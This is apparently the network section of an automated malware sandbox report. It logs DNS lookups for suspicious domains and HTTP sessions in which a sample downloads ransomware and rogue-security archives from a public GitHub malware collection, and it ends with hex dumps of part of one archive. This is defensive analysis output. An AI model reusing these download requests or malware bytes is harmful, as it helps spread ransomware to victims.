                                                                                                                                                            Sep 29, 2022 14:46:14.753669024 CEST8.8.8.8192.168.2.60x682eName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:17.027616024 CEST8.8.8.8192.168.2.60x3f90Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:17.078785896 CEST8.8.8.8192.168.2.60x828cName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:17.080527067 CEST8.8.8.8192.168.2.60x9f8cNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:17.750010014 CEST8.8.8.8192.168.2.60x92c2Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:19.753335953 CEST8.8.8.8192.168.2.60xdfaeName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:19.810219049 CEST8.8.8.8192.168.2.60xb61cName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:21.435365915 CEST8.8.8.8192.168.2.60xd9f7No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:21.435365915 CEST8.8.8.8192.168.2.60xd9f7No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:21.435365915 CEST8.8.8.8192.168.2.60xd9f7No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:21.435365915 CEST8.8.8.8192.168.2.60xd9f7No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:23.208890915 CEST8.8.8.8192.168.2.60x3b0cName error (3)www5.internet-security-guard.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:23.269758940 CEST8.8.8.8192.168.2.60xdd3bName error (3)secure1.safe-scanerwas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:23.310753107 CEST8.8.8.8192.168.2.60xad37Name error (3)secure2.simplenetworkzqi.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:23.439117908 CEST8.8.8.8192.168.2.60xe6cbName error (3)secure1.safe-scanerwas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:26.899245977 CEST8.8.8.8192.168.2.60xdc65No error (0)www.vikingwebscanner.com185.53.177.53A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:38.761307001 CEST8.8.8.8192.168.2.60x34aName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:54.077377081 CEST8.8.8.8192.168.2.60x1c2bName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:54.496254921 CEST8.8.8.8192.168.2.60xc24fName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:57.758254051 CEST8.8.8.8192.168.2.60xfa02Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:02.926687956 CEST8.8.8.8192.168.2.60x945cName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:03.150476933 CEST8.8.8.8192.168.2.60xc12Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:03.278316975 CEST8.8.8.8192.168.2.60xbe24No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:03.279334068 CEST8.8.8.8192.168.2.60x253No error (0)yandex.ru5.255.255.80A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:03.279334068 CEST8.8.8.8192.168.2.60x253No error (0)yandex.ru5.255.255.88A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:03.279334068 CEST8.8.8.8192.168.2.60x253No error (0)yandex.ru77.88.55.50A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:03.279334068 CEST8.8.8.8192.168.2.60x253No error (0)yandex.ru77.88.55.55A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:04.931732893 CEST8.8.8.8192.168.2.60xa2e2Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:12.537086964 CEST8.8.8.8192.168.2.60xb890Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:12.782854080 CEST8.8.8.8192.168.2.60x2927Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:14.879869938 CEST8.8.8.8192.168.2.60x6b75Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:15.928538084 CEST8.8.8.8192.168.2.60xa3fcNo error (0)arizonacode.bplaced.net162.55.0.137A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:16.453932047 CEST8.8.8.8192.168.2.60x1200No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:20.909090042 CEST8.8.8.8192.168.2.60x8f06No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:20.913793087 CEST8.8.8.8192.168.2.60xe43aName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:21.442953110 CEST8.8.8.8192.168.2.60x574Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:23.489682913 CEST8.8.8.8192.168.2.60xde82Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:24.541944981 CEST8.8.8.8192.168.2.60x4cc4Name error (3)ashamedice.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:24.547017097 CEST8.8.8.8192.168.2.60xcb28No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:24.848604918 CEST8.8.8.8192.168.2.60x1c7Name error (3)ashamedice.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:32.825225115 CEST8.8.8.8192.168.2.60xc173Name error (3)searchaccount.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:34.180217981 CEST8.8.8.8192.168.2.60x417fName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:34.471091986 CEST8.8.8.8192.168.2.60xdbecName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:36.030517101 CEST8.8.8.8192.168.2.60x999bName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:36.699294090 CEST8.8.8.8192.168.2.60xd2d7Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:36.700747013 CEST8.8.8.8192.168.2.60x229eNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:36.725759983 CEST8.8.8.8192.168.2.60x7da8Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:36.909509897 CEST8.8.8.8192.168.2.60x60cName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:38.318212032 CEST8.8.8.8192.168.2.60x6bc6Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:38.518815994 CEST8.8.8.8192.168.2.60xb218Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:38.825438023 CEST8.8.8.8192.168.2.60x3df2No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:39.364212990 CEST8.8.8.8192.168.2.60x75No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:39.847042084 CEST8.8.8.8192.168.2.60x3002Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:39.848278046 CEST8.8.8.8192.168.2.60x6df5No error (0)www.vikingwebscanner.com185.53.177.53A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:39.922682047 CEST8.8.8.8192.168.2.60xcd25No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:39.922682047 CEST8.8.8.8192.168.2.60xcd25No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:39.922682047 CEST8.8.8.8192.168.2.60xcd25No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:39.922682047 CEST8.8.8.8192.168.2.60xcd25No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:40.987405062 CEST8.8.8.8192.168.2.60x637No error (0)arizonacode.bplaced.net162.55.0.137A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:41.122822046 CEST8.8.8.8192.168.2.60x1ee8No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:43.582844019 CEST8.8.8.8192.168.2.60x7bfName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:44.144973040 CEST8.8.8.8192.168.2.60x604dName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:46.422070980 CEST8.8.8.8192.168.2.60xd06aNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:46.861157894 CEST8.8.8.8192.168.2.60x70Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:00.328299999 CEST8.8.8.8192.168.2.60x67d7Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:00.353729963 CEST8.8.8.8192.168.2.60x63fName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:01.176532984 CEST8.8.8.8192.168.2.60xac92No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:01.828936100 CEST8.8.8.8192.168.2.60x3eabName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:06.757008076 CEST8.8.8.8192.168.2.60x6ed5No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:07.781944036 CEST8.8.8.8192.168.2.60x2f5aName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:07.807336092 CEST8.8.8.8192.168.2.60xdd33Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:08.998963118 CEST8.8.8.8192.168.2.60x23ceName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:16.092031002 CEST8.8.8.8192.168.2.60x8ff8No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:16.143652916 CEST8.8.8.8192.168.2.60xe05bName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:16.891848087 CEST8.8.8.8192.168.2.60x2c41Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:23.284115076 CEST8.8.8.8192.168.2.60x7fa5Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:29.071116924 CEST8.8.8.8192.168.2.60xcaeeNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                            • fs.microsoft.com
                                                                                                                                                            • github.com
                                                                                                                                                            • raw.githubusercontent.com
                                                                                                                                                            • https:
                                                                                                                                                              • www.bing.com
                                                                                                                                                            • login.live.com
                                                                                                                                                            • watson.telemetry.microsoft.com
                                                                                                                                                            • yandex.ru
                                                                                                                                                            • searchdusty.com
                                                                                                                                                            • www.vikingwebscanner.com
                                                                                                                                                            • google.com
                                                                                                                                                            • google.ru
                                                                                                                                                            • 78.159.97.210
                                                                                                                                                            • arizonacode.bplaced.net
                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.64970723.50.105.163443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:39 UTC0OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                            2022-09-29 12:44:39 UTC0INHTTP/1.1 200 OK
                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                            X-Azure-Ref: 07xA1YwAAAAANlFLDDfUFRpn0EiXpbHv1TE9OMjFFREdFMTgyMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                            Cache-Control: public, max-age=225831
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:39 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            X-CID: 2


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.64970823.50.105.163443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:39 UTC0OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                            2022-09-29 12:44:39 UTC0INHTTP/1.1 200 OK
                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                            X-Azure-Ref: 0VeCoYgAAAABR/Z6+30B1RLQsXmQnL8CBTE9OMjFFREdFMDIxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                            Cache-Control: public, max-age=226317
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:39 GMT
                                                                                                                                                            Content-Length: 55
                                                                                                                                                            Connection: close
                                                                                                                                                            X-CID: 2
                                                                                                                                                            2022-09-29 12:44:39 UTC1INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            10192.168.2.649713140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:47 UTC514OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            100192.168.2.649758185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:18 UTC26954OUTGET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            101185.199.110.133443192.168.2.649758C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:18 UTC26954INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 857943
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "738aade4b65e8d55bc499c1fb84c57dfe29cfd2ed7020abafa8928ad4af9df68"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: BC88:67BA:7D00:C44DC:6335935E
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:18 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6936-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455518.144531,VS0,VE540
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: f8eecd1e79322dbe7a13228668b22cc23197b3b5
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:18 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:18 UTC26955INData Raw: 50 4b 03 04 14 00 01 00 08 00 b5 6e 76 3c 8d 65 a2 b8 9f 16 0d 00 fe b9 0d 00 19 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 43 44 65 66 65 6e 64 65 72 2e 65 78 65 c0 3f 16 f4 90 05 1f 72 a9 d7 14 6f e9 0f f9 e9 0c f1 a5 34 cc d0 b4 ad 49 9b 03 12 30 a4 5d b9 f3 f6 75 39 05 17 df 5c f2 dd ee aa bb e1 c2 73 4e ce 44 4b 40 f5 b8 2f df 0a 94 61 7e 5b a5 25 1c 40 89 cb 6e 1d 85 89 fd 7d b0 81 37 c8 fa a3 ea 88 c5 8c f5 74 a9 91 b4 3b bb c6 30 3d 10 ad 12 d2 7c c5 74 87 a3 f5 84 10 00 94 6c ae c3 b7 98 b3 38 ca e0 21 e8 8e af 57 b0 09 80 04 ce 23 d3 71 2a 42 8d b1 bb 7b 99 f9 53 b6 2c 07 79 ec c3 94 8e c9 1f cf 0d 2c 8e b4 97 32 76 13 0d 41 25 78 95 b2 3c dc b9 df 7b e1 6e 51 0e 8f aa 19 53 3e 94 42 8c 90 08 02 ce 1f 82 87 24 da 62 28 48 39 ba 48 89 e3 93 fa
                                                                                                                                                            Data Ascii: PKnv<eEndermanch@PCDefender.exe?ro4I0]u9\sNDK@/a~[%@n}7t;0=|tl8!W#q*B{S,y,2vA%x<{nQS>B$b(H9H
                                                                                                                                                            2022-09-29 12:45:18 UTC26971INData Raw: 80 8f 81 a5 74 9e 46 7f d0 d9 60 2c 64 53 c9 e4 47 c6 ee d6 22 56 56 47 70 3f 6d 75 98 fa 4a 75 58 a6 c4 2d 73 06 df e3 08 f1 a8 29 51 c2 23 60 6c d6 f3 4f 18 c3 d1 e2 de 30 fd a5 e0 80 d7 9c a7 63 54 16 c7 a7 04 91 ac 05 e2 59 3d ec 6b 9a b5 97 ce dc fc 74 86 d3 eb f8 8f 06 c8 8e 12 8d 07 ce b7 99 e3 fe f1 b2 b2 26 c2 11 28 c8 0e 88 72 a1 d0 fa 16 a4 f5 ae 4c c0 fa c7 87 f0 bb 4a ba e9 69 ea 01 b3 46 95 97 c1 7d 7d 9c 39 87 f7 99 46 20 3f 7d af b4 52 e4 e5 fb 6e f3 a6 c5 5b 69 93 a6 cf 1b 30 6b 10 3a 02 1d fa 78 3a f9 cf 9c 03 57 d7 64 e1 79 0e 9d ef a9 92 07 a1 4b 66 d4 f2 cf 23 a7 0e 8a 69 ff 7d 7c 1e 39 c3 58 c3 dc 61 7f b4 8e 3d f5 c7 a5 d4 a8 6d c0 27 71 c9 39 e3 ce 3a 3f c3 13 e2 71 bb 51 1f 96 27 f4 f9 ce a5 e7 77 c2 dc db a0 1c c9 f6 c1 b9 9a d1
                                                                                                                                                            Data Ascii: tF`,dSG"VVGp?muJuX-s)Q#`lO0cTY=kt&(rLJiF}}9F ?}Rn[i0k:x:WdyKf#i}|9Xa=m'q9:?qQ'w
                                                                                                                                                            2022-09-29 12:45:18 UTC26987INData Raw: e5 70 37 6b 58 86 6b 90 6b 8a 3d 01 61 06 34 5e 91 49 db 22 29 28 8c de 89 07 7a be fd 05 b8 58 e6 f7 eb e3 a8 54 ef d9 f9 ad 87 b0 70 26 a3 33 b7 05 c6 83 65 43 34 fa 59 4d 28 36 23 ab 1c 15 d2 7b 1e 48 2c 24 da 8d 84 a2 98 42 53 4a 12 52 34 34 05 cf ad 5c 90 31 f4 d6 ff 48 f7 6d 92 9c 6d 8f 38 ed 74 be fe b9 2a 0e 63 82 eb 0d d7 37 7a 35 71 4f 34 0b d8 8b 21 18 7f c5 53 58 e3 10 a2 5a 46 27 1a 88 de 44 30 ec 80 e0 c5 7c 6f 69 9e b5 cd f2 4e 42 a0 30 45 92 13 24 48 da 18 0e 13 eb d9 92 6b e0 40 97 29 76 53 ad 7c 39 89 27 ea 81 e5 fd 41 1d 6d ad e2 0f 7b 03 03 e8 4b fe b3 cf 47 f4 1a 81 a9 78 de ef e2 05 a5 00 89 fe f8 68 c5 2b e1 66 48 c9 04 0d fc 2a 39 a8 3e fc 35 a4 54 08 5b db ca 53 60 00 4f 72 74 e5 cb 09 3a 71 c7 c6 f7 dc 23 c4 23 92 ab e6 46 56 fa
                                                                                                                                                            Data Ascii: p7kXkk=a4^I")(zXTp&3eC4YM(6#{H,$BSJR44\1Hmm8t*c7z5qO4!SXZF'D0|oiNB0E$Hk@)vS|9'Am{KGxh+fH*9>5T[S`Ort:q##FV
                                                                                                                                                            2022-09-29 12:45:18 UTC27003INData Raw: 94 a0 e4 fe a6 b6 be 37 d8 94 2c 35 99 78 0f 44 f2 d0 5e 43 84 cd df 93 aa 7c d4 73 53 78 fc ea e4 ea d3 76 21 ee a2 4b a9 37 b1 7f 5a ad 32 f1 c3 60 1a 07 e2 49 79 15 76 39 a4 e4 e2 55 ff 52 88 73 3e ba 1a c4 2b 99 19 0b 84 6d 52 c1 d5 db 86 bf 69 86 8a 36 14 76 08 6f c6 bf a6 a6 f0 63 3d ce 4c 04 3f 74 87 38 78 75 84 c7 cf 1e 1e 2d 24 d5 86 f3 dd b0 6b 95 91 f9 80 3b 28 07 94 48 92 6c 84 53 5b 05 17 38 f8 02 9b 21 a0 98 27 25 37 a9 7b 9f 30 09 60 67 2c da 36 52 df 66 e7 df 85 0c fb 35 9e da f0 a3 a8 10 5c 3d 51 da 42 73 01 d0 39 05 63 91 cf b1 c6 09 0d 36 1b ca 1c e6 0e 80 dc b1 f4 42 5b 47 b1 a2 60 de 98 80 28 51 dc ce 63 df ff a5 9d 51 1e c6 63 8a 20 1c d5 bd 68 2e 1e 80 28 ed 9a 6c 22 99 95 da 27 5d 57 42 cc 19 80 35 35 b3 91 88 4e a5 d0 dd 39 43 09
                                                                                                                                                            Data Ascii: 7,5xD^C|sSxv!K7Z2`Iyv9URs>+mRi6voc=L?t8xu-$k;(HlS[8!'%7{0`g,6Rf5\=QBs9c6B[G`(QcQc h.(l"']WB55N9C
                                                                                                                                                            2022-09-29 12:45:18 UTC27019INData Raw: f8 7e 84 9e ad 9f f9 1b 49 ea 1a 50 39 da f2 eb 73 26 42 70 66 35 92 79 90 5b 62 d2 51 15 f8 e9 71 8b bc 6b 6c f0 44 59 93 fc de a5 b4 29 65 2b 3b 9f 41 57 2d 97 bb f9 ce bd 4a f7 5d 40 99 b5 f7 c0 af 81 d0 11 dd 3f 63 6f 86 19 8f a3 96 d2 8f e9 dc 9a 30 15 cf 95 cc 36 f8 99 80 15 98 bd 7c 0f dd 2f b3 df 99 10 38 c1 48 0c 0e 1c 6f 49 e0 4c 9a 53 2e 87 f1 c5 11 a2 0b 1d 1d 86 f0 aa e5 99 16 14 3f 77 28 66 25 9d 13 9b 35 e6 c2 30 2e 2d 66 3f cf 8e 09 b0 ae 24 90 b1 e0 91 59 db 6b 25 5a 4d 7d 00 c6 9e 92 d5 78 28 27 80 f7 a6 e7 3d a3 75 6a b9 f8 fe 31 e9 ee 63 9f 3c f5 ae 94 57 82 fe 1f 41 c2 99 c9 77 0a 85 1b 6b c6 8a da c8 91 28 b1 f0 91 eb 3b 40 a7 de 77 55 e6 39 b3 92 29 a6 ec 10 33 9e 69 5e 4d 3c 7c 83 5a a1 c6 e6 69 94 80 09 08 bf bb 8f 9e 8a ce 45 d1
                                                                                                                                                            Data Ascii: ~IP9s&Bpf5y[bQqklDY)e+;AW-J]@?co06|/8HoILS.?w(f%50.-f?$Yk%ZM}x('=uj1c<WAwk(;@wU9)3i^M<|ZiE
                                                                                                                                                            2022-09-29 12:45:18 UTC27035INData Raw: 6d f1 4c 31 4e e6 64 34 03 b8 5b 01 6c 4f 4d 01 d9 aa 79 92 02 3a c4 69 02 49 82 38 9a 20 e2 8b 64 a0 72 3c 0c 6d f3 d1 ee 15 84 cb e4 08 6c e0 be f7 34 be d5 4b 04 f1 3c 13 91 12 16 4b 78 17 fd 9e de 32 81 ad de 5b 81 d5 13 a9 1d 1b 14 0b 7d 00 c4 06 e8 c4 7d 02 2d cc d1 ff 54 64 73 52 1c f5 c1 77 09 65 ec 89 61 8f f9 22 6d 5c 48 25 4d 47 65 b9 d7 db 77 ed e4 86 40 26 07 1d 2f 10 82 03 24 cb f4 f5 41 6d c1 31 38 1d 06 33 b3 24 19 f9 ec 36 9a d6 5d 64 d4 63 98 00 a6 35 7f 3f 6b eb 26 31 91 b2 a9 94 61 0e 6a 0b 3b be 8f 56 d8 85 df b4 af 0d 79 58 82 aa 3b 19 34 fc 43 8f 48 39 1d ed 45 91 dd d8 1c 29 0c 18 07 a7 53 8c 26 d4 ad fe 50 d0 25 b1 e8 0f 9f 1e 88 1f 8b ba 4d 06 ba fd 97 9c 1c a9 9e 3e 30 b7 21 99 25 7e 60 92 2c 54 83 db 25 68 53 16 83 a9 23 09 2d
                                                                                                                                                            Data Ascii: mL1Nd4[lOMy:iI8 dr<ml4K<Kx2[}}-TdsRwea"m\H%MGew@&/$Am183$6]dc5?k&1aj;VyX;4CH9E)S&P%M>0!%~`,T%hS#-
